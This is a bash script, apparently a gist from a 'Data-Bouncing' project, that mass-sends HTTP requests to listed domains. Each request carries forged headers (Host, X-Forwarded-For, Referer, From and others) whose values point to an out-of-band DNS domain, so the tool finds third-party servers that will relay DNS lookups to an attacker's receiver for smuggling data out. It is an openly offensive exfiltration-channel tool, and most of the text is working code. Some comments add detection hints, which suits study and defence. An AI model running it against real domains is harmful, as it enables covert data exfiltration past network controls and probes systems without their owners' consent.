@yosignals
Created May 5, 2024 11:48
DataBouncing.io - Example 1 - The Recruiter.sh
#!/bin/bash
# A hunter script from John & Dave's Data-Bouncing project https://thecontractor.io/data-bouncing/
# This script will find candidates for smuggling data / comms / whatever, starting as HTTP/S requests to domains and ending up in your DNS receiver to be rebuilt / read / whatever
# Don't forget to add your own OOB server; that could be interactsh or collaborator, or something else. If you don't know what you're doing, go read the posts :)
# have fun, dont be a dick.
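# Pre-flight check: make sure curl, parallel and bc are on PATH and offer to
# install any that are missing through apt or yum (root is required for that).
# Diagnostics go to stderr, and a failed install stops the script instead of
# letting it continue without the tool.
for utility in curl parallel bc; do
  # Nothing to do when the tool is already available.
  if command -v "$utility" &> /dev/null; then
    continue
  fi

  # -r keeps any backslash in the answer literal.
  read -r -p "$utility is not installed. Would you like to install it? (y/N) " yn
  case "$yn" in
    [Yy]*)
      # Package installation needs root; refuse early rather than let the
      # package manager fail half-way.
      if [[ $EUID -ne 0 ]]; then
        echo "Please run this script as root or use sudo to install $utility." >&2
        exit 1
      fi

      if command -v apt &> /dev/null; then
        if ! { apt update && apt install -y "$utility"; }; then
          echo "Installing $utility with apt failed." >&2
          exit 1
        fi
      elif command -v yum &> /dev/null; then
        if ! yum install -y "$utility"; then
          echo "Installing $utility with yum failed." >&2
          exit 1
        fi
      else
        echo "Could not find a package manager to install $utility. Please install it manually." >&2
        exit 1
      fi
      ;;
    *)
      # Anything other than y/Y (including an empty answer) declines.
      echo "$utility is required for this script to run. Exiting." >&2
      exit 1
      ;;
  esac
done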
# Input list used when -d is not given on the command line.
domains_file="domains.txt"

# Out-of-band (OOB) domain; stays empty unless supplied with -o.
oob_domain=""

# Header templates, keyed by HTTP header name. The %s in each value is filled
# with the target domain by printf in process_domain. Every template ends in
# the literal "oob.com"; $oob_domain is not substituted into these values.
#
# For detection: a hostname rather than an IP address in the IP-type headers
# below (X-Forwarded-For, X-Real-IP, True-Client-IP, X-Client-IP, Client-IP,
# X-Originating-IP) is generally unusual in normal traffic, and any component
# that resolves such values will emit a DNS query for them.
declare -A headers=(
  # IP-type headers
  ["X-Forwarded-For"]="xff.%s.oob.com"
  ["X-Real-IP"]="rip.%s.oob.com"
  ["True-Client-IP"]="trip.%s.oob.com"
  ["X-Client-IP"]="xclip.%s.oob.com"
  ["Client-IP"]="clip.%s.oob.com"
  ["X-Originating-IP"]="origip.%s.oob.com"
  ["Forwarded"]="for=ff.%s.oob.com"
  # URL / address-type headers
  ["X-Wap-Profile"]="wafp.%s.oob.com/wap.xml"
  ["Referer"]="ref.%s.oob.com"
  ["Contact"]="root@contact.%s.oob.com"
  ["From"]="root@from.%s.oob.com"
)
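# Parse command-line options:
#   -o <domain>  out-of-band domain, stored in oob_domain
#   -d <file>    domains file, stored in domains_file
# The leading ':' in the optstring selects getopts' silent mode: an unknown
# option sets opt to '?', and a missing argument sets opt to ':' with the
# option letter in OPTARG. The two cases get separate messages so that
# "-o" without a value is not reported as an invalid option.
while getopts ":o:d:" opt; do
  case "$opt" in
    o)
      oob_domain=$OPTARG
      ;;
    d)
      domains_file=$OPTARG
      ;;
    :)
      echo "Option -$OPTARG requires an argument." >&2
      exit 1
      ;;
    *)
      echo "Invalid option: -$OPTARG" >&2
      exit 1
      ;;
  esac
done
# Drop the parsed options so that only positional arguments remain.
shift $((OPTIND - 1))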
# Browser-like User-Agent string sent with every request.
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"

# Stop early when the domains file is missing or is not a regular file.
if ! [[ -f $domains_file ]]; then
  echo "File $domains_file not found!"
  exit 1
fi

# Timestamped log file name (relative, so it lands in the current directory
# when the first line is appended to it).
log_file="script_log_$(date +"%Y%m%d_%H%M%S").txt"

# Number of non-empty lines in the domains file; used for progress reporting.
total_hosts=$(grep -c . "$domains_file")

# Make the settings visible to the child shells that run process_domain.
# NOTE(review): bash cannot export array variables, so exporting `headers`
# (an associative array) does not carry the header table into those child
# shells; only the four scalar variables are passed on.
export user_agent oob_domain total_hosts log_file headers
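#######################################
# Send one HTTP GET to a domain and report progress. Meant to be run once per
# input line by parallel.
# Globals:   user_agent, oob_domain, total_hosts, log_file, headers (read)
#            PARALLEL_SEQ (read; job sequence number set by GNU parallel,
#            treated as 0 when unset)
# Arguments: $1 - domain taken from one line of the domains file
# Outputs:   one progress line on stdout, the same line appended to $log_file
# Returns:   0 for an empty argument, otherwise the status of the log append
#######################################
process_domain() {
  # Locals keep the function from leaking state into the calling shell.
  local domain=$1
  local current_host_number=${PARALLEL_SEQ:-0}
  local percentage_complete=0
  local scaled header formatted_header timestamp log_message
  local -a curl_headers

  # Skip empty lines
  [[ -z $domain ]] && return

  # Percentage with two decimals. Multiply before dividing: dividing first at
  # two decimal places truncates to whole percents and reports 0 for the first
  # entries of any list longer than 100 hosts.
  if (( total_hosts > 0 )); then
    scaled=$(( current_host_number * 10000 / total_hosts ))
    printf -v percentage_complete '%d.%02d' "$(( scaled / 100 ))" "$(( scaled % 100 ))"
  fi

  # Fixed headers: the Host header carries the target domain as a label under
  # the OOB domain, Origin carries the target itself.
  curl_headers=(
    -H "User-Agent: ${user_agent}"
    -H "Host: host.${domain}.${oob_domain}"
    -H "Origin: https://${domain}"
  )

  # One extra header per entry of the `headers` table, when that table is
  # defined in the shell running this function.
  for header in "${!headers[@]}"; do
    # The format string is a template from the fixed table; only the argument
    # comes from the input file.
    # shellcheck disable=SC2059
    formatted_header=$(printf "${headers[$header]}" "$domain")
    curl_headers+=(-H "${header}: ${formatted_header}")
  done

  # The response is discarded; a curl failure is not checked. The URL is plain
  # http:// and redirects are not followed, so -k (skip TLS certificate
  # verification) has no effect on this request.
  curl -i -s -k -X GET \
    --max-time 16 \
    "${curl_headers[@]}" \
    "http://${domain}/" > /dev/null

  # Progress line, printed and appended to the log file.
  timestamp=$(date +"%Y-%m-%d %H:%M:%S")
  log_message="$timestamp - Request sent to $domain - $current_host_number of $total_hosts ($percentage_complete% complete)"
  printf '%s\n' "$log_message"
  printf '%s\n' "$log_message" >> "$log_file"
}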
# Export the function so the shells started by parallel can call it by name.
export -f process_domain

# One process_domain call per line of the domains file; "100%" asks parallel
# for one job slot per CPU core.
parallel --jobs 100% --arg-file "$domains_file" process_domain